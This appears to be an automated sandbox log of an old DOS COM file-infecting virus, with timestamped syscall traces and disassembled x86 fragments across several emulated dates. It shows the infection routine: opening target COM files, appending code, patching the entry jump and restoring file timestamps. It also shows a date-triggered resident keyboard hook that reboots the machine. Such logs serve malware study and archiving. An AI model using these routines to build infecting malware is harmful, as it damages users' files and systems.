2018-12-25T12:56:22.641916527Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.643255607Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.645983654Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.650135288Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.651936238Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.655103576Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.657274179Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.666419354Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.678698565Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.683080691Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.696265501Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.706307494Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.71452104Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.716118818Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.718743822Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.729274195Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.730962724Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.738903285Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.741276853Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.750989831Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.762120228Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.765100409Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.778249775Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.786017398Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.793516748Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.796444818Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.79932852Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.801450507Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.803217232Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.805210202Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.806500496Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.812416227Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.818973048Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.820983308Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.827705842Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.839614461Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.847546279Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.849470746Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.853257081Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.858039246Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.859951413Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.864146787Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.865379757Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.872406061Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.884726195Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.888206548Z 42 PC: 12b82 | Get date 0x12b82: cmp dl, 1
0x12b85: je 0x12b8a
0x12b87: jmp 0x12bf0
0x12b89: nop
0x12b8a: mov ah, 9
0x12b8c: int 0x21
0x12b8e: jmp 0x12bbd
0x12b90: nop
0x12b91: push ax
0x12b92: in al, 0x60
0x12b94: cmp al, 0x53
0x12b96: nop
0x12b97: nop
0x12b98: je 0x12ba0
0x12b9a: pop ax
0x12b9b: ljmp ptr cs:[0x29f]
0x12ba0: ljmp 0xffff:0
0x12ba5: iret
0x12ba6: cmp ax, 0x4b00
0x12ba9: jne 0x12baf
2018-12-25T12:56:22.890988484Z 26 PC: 12bfa | Set disk transfer address
2018-12-25T12:56:22.893930075Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=00000064h/0000000100d bytes. ')
2018-12-25T12:56:22.900772325Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17691,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:56:22.3442575Z 26 PC: 12ae4 | Set disk transfer address
2018-12-25T12:56:22.345966431Z 78 PC: 12aef | Find first file
2018-12-25T12:56:22.353263871Z 67 PC: 12b10 | Get or set file attributes
2018-12-25T12:56:22.370535377Z 61 PC: 12b19 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:56:22.377968815Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:56:22.386315886Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:56:22.388781887Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
0x12b40: call 0x22aad
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-25T12:56:22.391683315Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-25T12:56:22.402559367Z 66 PC: 12b4b | Move file pointer
2018-12-25T12:56:22.405101448Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:56:22.412908114Z 87 PC: 12b69 | Get or set file date and time
2018-12-25T12:56:22.423521992Z 62 PC: 12b6d | Close file
2018-12-25T12:56:22.432168937Z 67 PC: 12b7c | Get or set file attributes
2018-12-25T12:56:22.443568798Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.447426869Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.458956609Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.468040356Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.476402749Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.479293454Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.481946037Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.485063321Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.487902431Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.491182756Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.493233605Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.50281356Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.513853765Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.517988408Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.530225941Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.538043317Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.547564414Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.550515973Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.553233496Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.556521085Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.558320167Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.561677433Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.56321846Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.572377653Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.584398882Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.587364168Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.598257266Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.606148063Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.614061373Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.616001058Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.619566199Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.623285364Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.625166749Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.628704432Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.630696974Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.639068558Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.650967335Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.654396134Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.66541612Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.673038165Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.68136374Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.683303001Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.686307367Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.690350491Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.692240349Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.695344091Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.697710299Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.705779458Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.716982137Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.721119649Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.7307661Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.737126633Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.743659237Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.744946018Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.746805237Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.752696624Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.754166927Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.758724646Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.760024158Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.765752546Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.773154891Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.775652146Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.783276077Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.78796468Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.792433429Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.794242389Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.796437228Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.798827206Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.800634188Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.802857236Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.804094592Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.809799044Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.82225708Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.825429813Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.836545411Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.845069707Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.852332853Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.854203521Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.858225924Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.862838316Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.864637564Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.868169475Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.87011948Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.879307692Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.891565992Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.894311064Z 42 PC: 12b82 | Get date 0x12b82: cmp dl, 1
0x12b85: je 0x12b8a
0x12b87: jmp 0x12bf0
0x12b89: nop
0x12b8a: mov ah, 9
0x12b8c: int 0x21
0x12b8e: jmp 0x12bbd
0x12b90: nop
0x12b91: push ax
0x12b92: in al, 0x60
0x12b94: cmp al, 0x53
0x12b96: nop
0x12b97: nop
0x12b98: je 0x12ba0
0x12b9a: pop ax
0x12b9b: ljmp ptr cs:[0x29f]
0x12ba0: ljmp 0xffff:0
0x12ba5: iret
0x12ba6: cmp ax, 0x4b00
0x12ba9: jne 0x12baf
2018-12-25T12:56:22.896694876Z 9 PC: 12b8e | Display string (String= '�5Goat file (COM). Size=00000064h/0000000100d bytes. ')
2018-12-25T12:56:22.903416131Z 53 PC: 12bc2 | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:56:22.905737268Z 37 PC: 12bd4 | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:56:22.907210381Z 53 PC: 12bd9 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:56:22.909888882Z 49 PC: 12bf0 | Terminate and stay resident (Return code = '0' | Memory size = '31')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17691,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:56:22.64590608Z 26 PC: 12ae4 | Set disk transfer address
2018-12-25T12:56:22.647265564Z 78 PC: 12aef | Find first file
2018-12-25T12:56:22.65393062Z 67 PC: 12b10 | Get or set file attributes
2018-12-25T12:56:22.671603645Z 61 PC: 12b19 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:56:22.682890581Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:56:22.689505271Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:56:22.690939687Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
0x12b40: call 0x22aad
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-25T12:56:22.693369902Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-25T12:56:22.702473849Z 66 PC: 12b4b | Move file pointer
2018-12-25T12:56:22.703791236Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:56:22.710294702Z 87 PC: 12b69 | Get or set file date and time
2018-12-25T12:56:22.712192367Z 62 PC: 12b6d | Close file
2018-12-25T12:56:22.72022084Z 67 PC: 12b7c | Get or set file attributes
2018-12-25T12:56:22.729709212Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.732975848Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.742743984Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.749187185Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.756038805Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.757752383Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.760015822Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.76465836Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.765941328Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.768447448Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.770527813Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.777692135Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.787357312Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.790555285Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.80001879Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.806442657Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.813244176Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.814580181Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.816838864Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.820870744Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.822660996Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.825167046Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.827372409Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.832494314Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.842620725Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.845763449Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.855285639Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.861824087Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.868364281Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.870424231Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.872619878Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.87621712Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.877404674Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.879903427Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.88146104Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.889358557Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.901701622Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.904461556Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.915509117Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.921989291Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.928209099Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.931283114Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.933529347Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.936237481Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.938180353Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.940641803Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.942048247Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.949444391Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.959387056Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.961880134Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.972752908Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.979219503Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.985699146Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.987968476Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.990320442Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.998431066Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:23.000609846Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:23.006950609Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:23.008227979Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:23.016301413Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:23.026622286Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:23.030250274Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:23.040366308Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:23.046722759Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:23.052780629Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:23.055291637Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:23.057957943Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:23.060844953Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:23.063404626Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:23.065937304Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:23.067373439Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:23.075199274Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:23.08467543Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:23.087056728Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:23.097263578Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:23.101860408Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:23.108349515Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:23.110334835Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:23.112522932Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:23.1162415Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:23.117845323Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:23.120443104Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:23.121757853Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:23.12990003Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:23.140037439Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:23.142302431Z 42 PC: 12b82 | Get date 0x12b82: cmp dl, 1
0x12b85: je 0x12b8a
0x12b87: jmp 0x12bf0
0x12b89: nop
0x12b8a: mov ah, 9
0x12b8c: int 0x21
0x12b8e: jmp 0x12bbd
0x12b90: nop
0x12b91: push ax
0x12b92: in al, 0x60
0x12b94: cmp al, 0x53
0x12b96: nop
0x12b97: nop
0x12b98: je 0x12ba0
0x12b9a: pop ax
0x12b9b: ljmp ptr cs:[0x29f]
0x12ba0: ljmp 0xffff:0
0x12ba5: iret
0x12ba6: cmp ax, 0x4b00
0x12ba9: jne 0x12baf
2018-12-25T12:56:23.145341036Z 26 PC: 12bfa | Set disk transfer address
2018-12-25T12:56:23.146272529Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=00000064h/0000000100d bytes. ')
2018-12-25T12:56:23.151376349Z 76 PC: 12a86 | Terminate with return code (Return code = '36')